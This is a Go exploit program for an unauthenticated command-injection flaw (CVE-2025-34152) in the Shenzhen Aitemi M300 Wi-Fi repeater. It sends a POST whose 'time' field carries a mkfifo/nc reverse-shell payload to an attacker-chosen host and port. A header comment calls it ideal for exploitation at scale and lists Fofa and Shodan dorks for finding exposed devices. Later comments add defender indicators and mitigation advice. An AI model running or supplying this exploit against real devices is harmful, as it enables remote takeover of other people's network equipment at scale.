package main
import (
"flag"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
)
/*
Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (CVE-2025-34152):
shell command injection through the "time" form field of a POST to /protocol.csp
- does not require authentication (even when the login panel is enabled)
- does not reboot the device
- does not affect network configuration
- ideal for automated exploitation at scale
Dorks:
- Fofa: icon_hash="-741058468" && server="lighttpd/1.4.32"
- Shodan: http.favicon.hash:-741058468 lighttpd/1.4.32
*/
// main sends one POST request to <host>/protocol.csp? whose "time" form field
// holds a shell command substitution, then prints the HTTP status and body.
//
// Flags: -u target base URL, -i and -p address and port placed into the
// command, -x optional HTTP proxy. The program exits with status 1 when -u,
// -i or -p is empty, or when any step below returns an error.
//
// Defender notes (request shape taken from the code below):
//   - Network indicator: POST to /protocol.csp with body fields fname=system,
//     opt=time_conf, function=set and a time value that, once URL-decoded,
//     starts with "$(". The value is percent-encoded on the wire, so match
//     after decoding. A time setting has no reason to contain "$(", ";", "|"
//     or "<"; their presence in this field is worth alerting on or blocking.
//   - Client traits: no headers are set here, so the request has no
//     Content-Type and carries Go's default User-Agent unless a proxy
//     rewrites it. Treat these as weak signals only; both are trivial to change.
//   - Host indicators: a FIFO at /tmp/x and an outbound nc connection from the
//     repeater to an external address.
//   - NOTE(review): the payload form suggests the firmware passes the time
//     value to a shell without sanitising it; confirm against the
//     CVE-2025-34152 advisory.
//   - Mitigation: keep the web management interface unreachable from
//     untrusted networks, and apply a vendor fix if one is available.
func main() {
host := flag.String("u", "", "Target host URL (e.g., http://192.168.11.1)")
lhost := flag.String("i", "", "Attacker IP for reverse shell")
lport := flag.String("p", "", "Attacker port for reverse shell")
proxyURL := flag.String("x", "", "Optional proxy URL (e.g., http://127.0.0.1:8080)")
flag.Parse()
// All three of -u, -i and -p are mandatory; only -x may be omitted.
if *host == "" || *lhost == "" || *lport == "" {
fmt.Printf("Usage: %s -u <host_url> -i <lhost> -p <lport> [-x <proxy_url>]\n", os.Args[0])
os.Exit(1)
}
// Drop trailing slashes so the path below is appended with a single "/".
h := strings.TrimRight(*host, "/")
// The request URL ends in "?" with an empty query string; every parameter
// travels in the POST body.
endpoint := h + "/protocol.csp?"
// The whole value is wrapped in $( ... ), i.e. shell command substitution.
// -i and -p are inserted as given, with no validation.
raw := fmt.Sprintf("$(mkfifo /tmp/x; nc %s %s < /tmp/x | /bin/sh > /tmp/x 2>&1)", *lhost, *lport)
// QueryEscape encodes spaces as "+"; the next line rewrites them to %20.
// NOTE(review): presumably the device does not decode "+" as a space; confirm.
encoded := url.QueryEscape(raw)
encoded = strings.ReplaceAll(encoded, "+", "%20")
// Fixed fields fname/opt/function select the handler; only "time" varies.
body := fmt.Sprintf("fname=system&opt=time_conf&function=set&time=%s", encoded)
// No credentials, cookies or other headers are attached to the request.
req, err := http.NewRequest("POST", endpoint, strings.NewReader(body))
if err != nil {
fmt.Printf("[!] Request creation failed: %v\n", err)
os.Exit(1)
}
// A fresh transport is used; a proxy is configured only when -x was given.
transport := &http.Transport{}
if *proxyURL != "" {
// This err is scoped to the if block and shadows the outer err.
parsedURL, err := url.Parse(*proxyURL)
if err != nil {
fmt.Printf("[!] Invalid proxy URL: %v\n", err)
os.Exit(1)
}
transport.Proxy = http.ProxyURL(parsedURL)
}
client := &http.Client{Transport: transport}
resp, err := client.Do(req)
if err != nil {
fmt.Printf("[!] Request failed: %v\n", err)
os.Exit(1)
}
// Note: the os.Exit call in the read-error path below skips this deferred Close.
defer resp.Body.Close()
// The status code and raw body are printed as received; nothing in this
// program checks whether the injected command actually ran.
fmt.Printf("[+] Response %d\n", resp.StatusCode)
data, err := io.ReadAll(resp.Body)
if err != nil {
fmt.Printf("[!] Reading response failed: %v\n", err)
os.Exit(1)
}
fmt.Println(string(data))
}